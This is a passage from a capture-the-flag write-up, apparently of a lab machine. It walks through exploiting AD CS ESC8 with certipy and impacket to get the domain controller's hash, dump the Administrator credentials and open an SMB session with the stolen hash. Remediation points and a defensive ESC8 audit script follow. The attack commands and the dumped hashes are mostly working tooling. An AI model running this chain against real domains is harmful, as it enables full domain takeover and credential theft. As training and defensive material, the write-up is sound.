[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] HTTP Request: POST http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 95
[*] Retrieving certificate for request ID: 95
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certnew.cer?ReqID=95 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Certificate object SID is 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Saving certificate and private key to 'dc-jpq225.pfx'
[*] Wrote certificate and private key to 'dc-jpq225.pfx'
[*] Exiting...
Now that we have the certificate, we can hopefully use certipy to authenticate as the DC’s machine account and extract its hash:
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
As a bonus we also get a Kerberos TGT. Let’s set up our environment to use that instead of Rosie’s:
export KRB5CCNAME=dc-jpq225.ccache
Then, we can dump hashes from the machine with impacket:
impacket-secretsdump -k -no-pass cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a
Administrator:aes128-cts-hmac-sha1-96:926e5da4d5cd0be6e1cea21769bb35a4
Administrator:des-cbc-md5:fd2a29621f3e7604
[*] Cleaning up...
Then, we can use this hash to get SMB access as Administrator to access all files on the machine:
impacket-smbclient -k -hashes 'aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87' cicada.vl/Administrator@DC-JPQ225.cicada.vl
/home/kali/.virtualenvs/htb/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
Type help for list of commands
#
We can then find both user.txt and root.txt on the Administrator’s desktop:
# ls
drw-rw-rw- 0 Fri Apr 11 02:00:38 2025 .
drw-rw-rw- 0 Fri Sep 13 12:10:12 2024 ..
-rw-rw-rw- 282 Fri Sep 13 06:21:49 2024 desktop.ini
-rw-rw-rw- 2304 Sun Sep 15 09:26:47 2024 Microsoft Edge.lnk
-rw-rw-rw- 34 Sat Jul 5 17:32:50 2025 root.txt
-rw-rw-rw- 34 Sat Jul 5 17:32:50 2025 user.txt
Closing the Vulnerability
- Don’t store passwords on sticky notes - even with the ESC8 vulnerability we wouldn’t have been able to exploit it without Rosie.Powell’s credentials.
- Make sure images you post don’t have sensitive info - even though Rosie put her password on a sticky note, we still would’ve needed physical access to her desk to exploit this, except that she or someone else shared a picture that accidentally disclosed her password.
- Be careful what you put on NFS, since connecting potentially gives users access to everything in the share regardless of the system-level permissions.
- Watch out for the ESC series of vulnerabilities in Active Directory Certificate Services. The following must all be present for an ESC8 vulnerability to exist:
- AD CS Web Enrollment enabled
- NTLM authentication (or, as on this box where NTLM was disabled, Kerberos) accepted over HTTP
- Certificate templates with auto-issue set
- Weak validation of certificate requests (i.e. a single person can do it)
- An attacker able to coerce authentication from a privileged account (here, the DC’s machine account)
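As an added example (not from this writeup and not part of Certipy), here is a small Python audit that reads the JSON layout Certipy writes, as shown in the `find` output above, and flags the ESC8 preconditions from the list above: Web Enrollment enabled, Request Disposition set to Issue, a broad group holding the Enroll right on the CA, and enabled client-authentication templates that a relayed user or machine account could enroll in. The sample data, the LAB.LOCAL domain and the CA names are constructed; the field names and the "512" Enroll right key are taken from the output above.

```python
"""Audit Certipy 'find' JSON for ESC8 preconditions (added example, not Certipy's own code)."""
import json

CA_ENROLL_RIGHT = "512"   # Certipy's access-right key for Enroll on a CA object
BROAD = {"Authenticated Users", "Domain Users", "Everyone"}
MACHINE_GROUPS = {"Domain Computers", "Domain Controllers", "Enterprise Domain Controllers"}

# Constructed sample in the same layout Certipy writes; not the box's real output.
SAMPLE = json.loads(r'''
{
  "Certificate Authorities": {
    "0": {"CA Name": "lab-DC01-CA", "Web Enrollment": "Enabled", "Request Disposition": "Issue",
          "Permissions": {"Access Rights": {"512": ["LAB.LOCAL\\Authenticated Users"]}}},
    "1": {"CA Name": "lab-SUB-CA", "Web Enrollment": "Disabled", "Request Disposition": "Issue",
          "Permissions": {"Access Rights": {"512": ["LAB.LOCAL\\Authenticated Users"]}}}
  },
  "Certificate Templates": {
    "0": {"Template Name": "DomainController", "Certificate Authorities": ["lab-DC01-CA"],
          "Enabled": true, "Client Authentication": true,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights": ["LAB.LOCAL\\Domain Controllers"]}}},
    "1": {"Template Name": "User", "Certificate Authorities": ["lab-DC01-CA"],
          "Enabled": true, "Client Authentication": true,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights": ["LAB.LOCAL\\Domain Users"]}}},
    "2": {"Template Name": "WebServer", "Certificate Authorities": ["lab-DC01-CA"],
          "Enabled": true, "Client Authentication": false,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights": ["LAB.LOCAL\\Domain Admins"]}}}
  }
}
''')


def _name(principal):
    """Strip the DOMAIN\\ prefix Certipy puts in front of every principal."""
    return principal.rsplit("\\", 1)[-1]


def esc8_cas(data):
    """CAs meeting all ESC8 preconditions: web enrollment on, auto-issue, broad Enroll right."""
    found = []
    for ca in data.get("Certificate Authorities", {}).values():
        rights = ca.get("Permissions", {}).get("Access Rights", {})
        enrollers = [p for p in rights.get(CA_ENROLL_RIGHT, []) if _name(p) in BROAD]
        web_on = ca.get("Web Enrollment") == "Enabled"
        auto_issue = ca.get("Request Disposition") == "Issue"
        if web_on and auto_issue and enrollers:
            found.append({"ca": ca["CA Name"], "enrollers": enrollers})
    return found


def relay_targets(data, ca_name):
    """Enabled client-auth templates on ca_name and which class of coerced principal could use them."""
    targets = []
    for t in data.get("Certificate Templates", {}).values():
        if not (t.get("Enabled") and t.get("Client Authentication")):
            continue
        if ca_name not in t.get("Certificate Authorities", []):
            continue
        perms = t.get("Permissions", {}).get("Enrollment Permissions", {})
        names = {_name(p) for p in perms.get("Enrollment Rights", [])}
        via = []
        if names & BROAD:
            via.append("any user")
        if names & MACHINE_GROUPS:
            via.append("machine accounts")   # e.g. a coerced DC$ as in the writeup
        if via:
            targets.append((t["Template Name"], ", ".join(via)))
    return targets


def report(data):
    """One line per vulnerable CA plus one per template a relayed principal could enroll in."""
    lines = []
    for f in esc8_cas(data):
        lines.append(f"[!] ESC8: {f['ca']} (Enroll granted to {', '.join(f['enrollers'])})")
        for name, via in relay_targets(data, f["ca"]):
            lines.append(f"    relayable template {name}: usable by {via}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE)) or "no ESC8 findings")
```

To run it against a real capture, replace `SAMPLE` with `json.load(open("<your>_Certipy.json"))`; remediation is to disable Web Enrollment where unused or to require HTTPS with Extended Protection for Authentication on the enrollment endpoints.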
Key Penetration Testing Takeaways
- All ports matter; think about how services in various places might be chained together to get you what you need.
- Sometimes it is handy to have an environment besides just Linux around, even if it’s just a Windows VM.
- Sometimes you have to be willing to go the extra mile to get a complicated exploit to work.
- Exploits can be flaky.
- Investigate posted pictures from known employees to see if things may have been exposed inadvertently.